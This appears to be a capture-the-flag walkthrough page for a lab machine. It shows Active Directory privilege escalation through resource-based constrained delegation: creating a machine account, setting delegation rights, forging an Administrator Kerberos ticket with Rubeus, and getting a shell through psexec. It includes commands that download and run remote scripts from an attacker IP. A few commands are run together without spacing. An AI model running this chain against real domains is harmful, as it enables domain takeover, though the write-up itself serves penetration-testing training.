Priv Esc
Outbound object rights
Generic all
We are going to create a new machine account
When you create accounts in AD you can specify the password
Now that we know the password the machine account, we can use it so sign tickets
We can then grab the SID
We then add the ability for to act on the behalf of other identities to the new computer
This will allow the computer to sign Kerberos rickets for other users other than itself (S4U)
Now we can forge a ticket from the Administrator that comes this machine and machines in the domain will trust it
Use the ticket to get a pop a shell
*Evil-WinRM* PS C:\Users\support\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> curl 10.10.14.3/Rubeus.exe -o Rubeus.exe
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Powermad.ps1')
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/PowerView.ps1')Test permissions
Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota
New-MachineAccount -MachineAccount Adot8Machine -Password $(ConvertTo-SecureString 'adot8' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer Adot8Machine -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)Get-DomainComputer Adot8Machine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}.\Rubeus.exe hash /password:adot8
.\Rubeus.exe s4u /user:Adot8Machine$ /rc4:872E7BD85E304E2AF28DFE1BDAF25D8B /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /ptt
base64 -d ticket.kirbi.b64 > ticket.kirbiticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccacheimpacket-psexec -k -no-pass support.htb/[email protected]
Last updated
Was this helpful?